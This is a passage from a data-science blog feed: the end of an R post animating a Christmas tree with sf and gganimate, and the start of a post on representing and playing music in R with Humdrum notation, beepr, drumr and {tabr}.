&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;points &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_sample&lt;/span&gt;(tree, &lt;span style="color:#a5d6ff"&gt;75&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;colours &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;yellow&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;blue&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;75&lt;/span&gt;, replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(), data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;tree, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;forestgreen&amp;#34;&lt;/span&gt;, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;darkgreen&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(), data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;points, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; colours) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_rect&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(xmin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-0.75&lt;/span&gt;, xmax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.75&lt;/span&gt;, ymin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-2&lt;/span&gt;, ymax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;saddlebrown&amp;#34;&lt;/span&gt;, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sienna4&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;), color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;gold&amp;#34;&lt;/span&gt;, shape &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, stroke &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_void&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_sf&lt;/span&gt;(xlim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;), ylim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;annotate&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;9.5&lt;/span&gt;, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Merry Christmas \n From Jumping Rivers!&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="tree_lights.png" class="image-center" style="width: 450px;" alt = "Christmas tree with lights made with the sf and ggplot2 R packages."/&gt;
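&lt;p&gt;As a quick check on the sampling step, here is a minimal sketch that uses a
small stand-in triangle (hypothetical coordinates, not the tree above) and
confirms that every sampled point falls inside the polygon. The
&lt;code&gt;set.seed&lt;/code&gt; call and its seed value are our own assumptions; they
simply make the randomly placed lights reproducible between runs.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(sf)

# Stand-in polygon: a simple triangle (assumed coordinates, for illustration).
# The ring is closed: the first and last rows are identical.
triangle_coords = list(
  matrix(
    c(-4, 0,
       4, 0,
       0, 8,
      -4, 0),
    ncol = 2, byrow = TRUE
  )
)
triangle = st_sfc(st_polygon(triangle_coords))

# Fix the random seed so the same lights are drawn on every run
set.seed(2024)
lights = st_sample(triangle, 75)

# TRUE if every sampled point lies within (or on the edge of) the polygon
all_inside = all(st_intersects(lights, triangle, sparse = FALSE))
all_inside
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The same check could be run on the real tree by swapping in
&lt;code&gt;st_sfc(tree)&lt;/code&gt;. Wrapping the polygon in &lt;code&gt;st_sfc&lt;/code&gt; is a
precaution on our part rather than something the code above requires.&lt;/p&gt;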
&lt;p&gt;We can now animate it to make the lights sparkle using &lt;code&gt;transition_time&lt;/code&gt;
and &lt;code&gt;ease_aes&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;transition_time&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;75&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ease_aes&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;linear&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="twinkling_christmas_tree.gif" class="image-center" style="width: 450px;" alt = "Final Christmas tree GIF with sparkling lights."/&gt;
&lt;p&gt;Lastly, have a great Christmas and New Year from the Jumping Rivers
team!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/christmas-tree/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why would I use R for music?</title><link>https://www.jumpingrivers.com/blog/music-in-r/</link><pubDate>Thu, 19 Dec 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/music-in-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/music-in-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;With Christmas around the corner, and in the spirit of spreading some
joy out into the world, I decided not to write about {shiny}, or data
workflows, or developments in base R for a change. Rather, this post is
about something that brings me joy: music.&lt;/p&gt;
&lt;p&gt;Not that R doesn’t bring me joy. Hey, I’ve ‘done data’ in other
languages and in the point-and-click world. Solving the data problem
with R brings a very different kind of joy….&lt;/p&gt;
&lt;p&gt;As with most of my blogs, this one started with a daft project. I wanted
to make an app that printed out musical notation, with randomly-sampled
notes, that I could use as improvisation prompts when playing piano at
my local experimental music open mic. A problem we’ve all faced.&lt;/p&gt;
&lt;p&gt;This felt like something I could build in {shiny}, though it proved a
little more difficult than I expected. Solving the problem completely
might need a second blog post, an htmlwidget, and a bit of JavaScript
knowledge.&lt;/p&gt;
&lt;p&gt;Here, we’ll talk about music in R, what packages are available, how to
represent musical notation, and what people are actually doing with
music data in R. We’ll maybe round off with a public domain Christmas
carol or two, for good measure.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-music-in-r"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="computer-world-musical-scores-sequencers-and-beeping-chips"&gt;Computer World: Musical scores, sequencers and beeping chips&lt;/h2&gt;
&lt;p&gt;Home computers have been making music since the 1970s. At a time when
dedicated sound chips belonged to a distant future, electromagnetic
interference from bit switches in an Altair was hacked to play “Fool on
the Hill” through a neighbouring radio (outlined in &lt;a href="https://global.oup.com/academic/product/bits-and-pieces-9780190496104?lang=en&amp;cc=gb" rel="external"&gt;“Bits and
Pieces”&lt;/a&gt;,
KB McAlpine, p154). Even earlier than this, people had made music on
research computers at universities (“Bits and Pieces”, p12). The
development, hand-in-hand, of electronic music, computer sound chips,
music software and video games is a fascinating story. But that’ll have
to wait for another day.&lt;/p&gt;
&lt;p&gt;Fundamental to those developments was a simple question: how do you
represent a piece of music inside a computer? Converting this
representation into sound is a separate issue, because there are things
you can do with music beyond listening to it. You can compare different
aspects of a collection of songs (keys, harmonies, lyrics etc), you can
(attempt to) get a computer to &lt;a href="https://www.bbc.com/future/article/20140808-music-like-never-heard-before" rel="external"&gt;compose new
music&lt;/a&gt;,
or you can rearrange a given piece or print out sheet music for
musicians to play from. For example &lt;a href="https://kshaffer.github.io/2016/08/exploring-musical-data-with-R/" rel="external"&gt;here Kris
Shaffer&lt;/a&gt;
analyses chords in 100 rock songs using R, and here is a
&lt;a href="https://brunaw.com/shortcourses/IXSER/en/pres-en.html#1" rel="external"&gt;presentation&lt;/a&gt;
analysing chords, lyrics and Spotify data by Bruna Wundervald and Julio
Trecenti using packages from the &lt;a href="https://github.com/r-music" rel="external"&gt;r-music&lt;/a&gt;
organization.&lt;/p&gt;
&lt;p&gt;Nowadays, most of the music stored on your computer will be stored as
recordings, such as mp3s. This wasn’t originally the case: early games
encoded music directly using note pitches and durations - much like you
find in sheet music. A modern view of this representation is provided by
the &lt;a href="https://www.humdrum.org/index.html" rel="external"&gt;Humdrum&lt;/a&gt; format. The following
snippet encodes the chorus melody for “Jingle Bells”.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;**kern
=1
4e
4e
2e
=2
4e
4e
2e
=3
4e
4g
4c
4d
=4
1e
=5
*-
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can view that melody in an &lt;a href="https://verovio.humdrum.org/" rel="external"&gt;online
tool&lt;/a&gt;, and we get traditional music
notation back out:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/images/jingle.svg" alt="Musical score for the Jingle Bells chorus"
style="display: block; margin-left: auto; margin-right: auto;"&gt;&lt;/p&gt;
&lt;p&gt;The pairs “4g”, “2e”, “1e”, and so on, represent the duration (4, 2, 1
in increasing length; 4 being a crotchet or ‘quarter-note’) and pitch
(e, g). The lines beginning with “=” (“=1”, “=2”, and so on) separate bars, and the &lt;code&gt;&amp;quot;**kern&amp;quot;&lt;/code&gt; and &lt;code&gt;&amp;quot;*-&amp;quot;&lt;/code&gt; lines
delimit the whole sequence. To represent multiple notes playing at the
same time, you can use additional vertical tracks (spines) to represent
the additional notes. The syntax can get pretty
&lt;a href="https://www.humdrum.org/guide/ch06/" rel="external"&gt;complicated&lt;/a&gt; but so does sheet
music….&lt;/p&gt;
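&lt;p&gt;To make the encoding concrete, here is a minimal base-R sketch that splits
the note tokens of the melody above into a duration and a pitch. The helper
name &lt;code&gt;parse_kern_notes&lt;/code&gt; is hypothetical, and the sketch only
handles the simple digits-then-letter tokens used in this example, not the
full Humdrum syntax.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# The Humdrum lines from above, including the barlines and delimiters
kern = strsplit(
  &amp;#34;**kern =1 4e 4e 2e =2 4e 4e 2e =3 4e 4g 4c 4d =4 1e =5 *-&amp;#34;,
  &amp;#34; &amp;#34;
)[[1]]

# Hypothetical helper: keep tokens made of digits followed by one letter a-g,
# then split each token into its duration and its pitch
parse_kern_notes = function(tokens) {
  notes = grep(&amp;#34;^[0-9]+[a-g]$&amp;#34;, tokens, value = TRUE)
  data.frame(
    duration = as.integer(sub(&amp;#34;[a-g]$&amp;#34;, &amp;#34;&amp;#34;, notes)),
    pitch = sub(&amp;#34;^[0-9]+&amp;#34;, &amp;#34;&amp;#34;, notes)
  )
}

jingle = parse_kern_notes(kern)
head(jingle, 3)

# Total length in whole notes (semibreves): a duration of 4 counts as 1/4
sum(1 / jingle$duration)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Barlines and the two delimiter lines do not match the pattern, so they are
dropped and only the notes remain.&lt;/p&gt;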
&lt;h2 id="solid-state-survivor-sounds-in-r---beepr-audio-tuner"&gt;Solid State “S”urvivor: Sounds in R - {beepr}, {audio}, {tuneR}&lt;/h2&gt;
&lt;p&gt;When R evolved from S in 1993, creating music might not have been on
its horizon.&lt;/p&gt;
&lt;p&gt;R wasn’t really on my horizon at the time either. I was at school, and
spent quite a bit of spare time writing music in
&lt;a href="https://en.wikipedia.org/wiki/OctaMED" rel="external"&gt;OctaMED&lt;/a&gt; on a Commodore Amiga -
again, involving multiple vertical tracks of pitches and durations.&lt;/p&gt;
&lt;p&gt;Can R even make a sound? Aside from the groans that
&lt;code&gt;Error in mean[1:3]: object of type 'closure' is not subsettable&lt;/code&gt; can evoke?&lt;/p&gt;
&lt;p&gt;Yes it can. There are a few packages available for producing sound in R.
My favourite is
&lt;a href="https://cran.r-project.org/web/packages/beepr/index.html" rel="external"&gt;{beepr}&lt;/a&gt;. If
you’ve got a long-running script burning away on your computer, what
better way to celebrate its completion than with a fanfare, or with the
Super Mario Bros “Level Complete” tune:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;source&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my-beautiful-script.R&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;beepr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;beep&lt;/span&gt;(sound &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;mario&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Doodly-doodly-doo!&lt;/p&gt;
&lt;p&gt;You could similarly have a cymbal crash when you’ve finally loaded that
big dataset if you install
&lt;a href="https://cran.r-project.org/web/packages/drumr/" rel="external"&gt;{drumr}&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cars &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;); mtcars}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;drumr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;beat&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;crash&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We aren’t going to go any further into emitting sounds or analysing
music from R here. But there are a few packages like {audio} and {tuneR}
that can be used for this purpose.&lt;/p&gt;
&lt;h2 id="replicas-representing-music-and-making-sheet-music-in-r"&gt;Replicas: Representing music and making sheet music in R&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://leonawicz.github.io/tabr/" rel="external"&gt;{tabr}&lt;/a&gt; is a CRAN package providing
the ability to handle musical scores as data. It also provides the
ability to render sheet music from this data, by integrating with a
system dependency &lt;a href="https://lilypond.org/" rel="external"&gt;‘LilyPond’&lt;/a&gt;. Once you have
installed both LilyPond and {tabr}, you can construct sheet music from
R. The syntax for encoding melodies in {tabr} is similar to, but not the
same as, that used in Humdrum above.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tabr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;melody &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_music&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;e4 e e2 e4 e e2 e4 g c d e1&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_music&lt;/span&gt;(melody)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/images/tabrFirstJingle-1.png"&gt;
&lt;p&gt;So again, we encode notes with both pitch and duration, though now the
duration comes after the pitch (‘e4’ is a crotchet E). We don’t need to
specify the duration of a note, if it is the same as the preceding note.
{tabr} has added a time-signature and tempo using some default values.
This particular tempo might not help Santa get his sleigh off the ground
though - that’s about half the speed at which Bing Crosby recorded it. The
notes are written out in a lower octave than in the Humdrum example,
too.&lt;/p&gt;
&lt;p&gt;We can fix all that though. While we’re at it let’s make that final run
a bit sassier:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;melody &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_music&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;e&amp;#39;4 e&amp;#39; e&amp;#39;2 e&amp;#39;4 e&amp;#39; e&amp;#39;2 e&amp;#39;4 g&amp;#39; c&amp;#39;~ c&amp;#39;8 d&amp;#39;8 e&amp;#39;1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tempo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;2 = 120&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_music&lt;/span&gt;(melody)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/images/tabrSecondJingle-1.png"&gt;
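&lt;p&gt;Going back to the first, simpler melody string, the relationship between the
Humdrum tokens and the {tabr} string can be sketched in base R. The helper
below is hypothetical (&lt;code&gt;to_tabr_string&lt;/code&gt; is our own name, not part
of {tabr}): it flips each token into pitch-then-duration order and drops a
duration that repeats the previous one. It assumes tokens made of digits
followed by a single letter.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper, not a {tabr} function: 4e becomes e4, and the
# duration is omitted when it matches the preceding note
to_tabr_string = function(tokens) {
  duration = sub(&amp;#34;[a-g]$&amp;#34;, &amp;#34;&amp;#34;, tokens)
  pitch = sub(&amp;#34;^[0-9]+&amp;#34;, &amp;#34;&amp;#34;, tokens)
  # TRUE where the duration equals that of the previous note
  repeated = c(FALSE, duration[-1] == duration[-length(duration)])
  paste0(pitch, ifelse(repeated, &amp;#34;&amp;#34;, duration), collapse = &amp;#34; &amp;#34;)
}

# Note tokens of the Jingle Bells chorus in Humdrum order (duration first)
notes = strsplit(&amp;#34;4e 4e 2e 4e 4e 2e 4e 4g 4c 4d 1e&amp;#34;, &amp;#34; &amp;#34;)[[1]]
to_tabr_string(notes)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For these tokens the result is the same string that was passed to
&lt;code&gt;as_music&lt;/code&gt; in the first {tabr} example.&lt;/p&gt;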
&lt;p&gt;You can look up the syntax used in the music strings in the
&lt;code&gt;tabrSyntax&lt;/code&gt; data frame.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tabrSyntax
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;##                  description    syntax    example
##  1               note/pitch a b ... g          a
##  2                    sharp         #         a#
##  3                     flat         _         a_
##  4 drop or raise one octave    , or '    a, a a'
##  5            octave number   0 1 ...   a2 a3 a4
##  6               tied notes         ~       a~ a
##  7            note duration       2^n 1 2 4 8 16
##  8              dotted note         .     2. 2..
##  9                    slide         -         2-
## 10                     bend         ^         2^
## 11          muted/dead note         x         2x
## 12     slur/hammer/pull off        ()      2( 2)
## 13                     rest         r          r
## 14              silent rest         s          s
## 15       expansion operator         * ceg*8, 1*4
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For guitarists, there’s also the ability to plot out guitar tab (hence
the name; strangely the notes have been transposed by an octave):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_music_guitar&lt;/span&gt;(melody, header&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jingle Bells&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/images/tabrGuitarJingle-1.png"&gt;
&lt;p&gt;It should be noted that {tabr} is not as flexible as LilyPond when it
comes to creating musical scores, and indeed, the author recommends that
“If you are only creating sheet music on a case by case basis, write
your own LilyPond files manually”. The truth is, I got a lot of errors
while experimenting with {tabr}, but it was still a fun experiment.&lt;/p&gt;
&lt;h2 id="blue-lines-adding-scores-to-an-app"&gt;Blue Lines: Adding scores to an app&lt;/h2&gt;
&lt;p&gt;I originally wanted to randomly generate musical phrases that I could
interpret myself. And {tabr} looked like a good fit for just printing
out notes to an app.&lt;/p&gt;
&lt;p&gt;We sample from two octaves of the ‘white notes’ of the C major scale:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# C major notes from G below middle-C&lt;/span&gt;
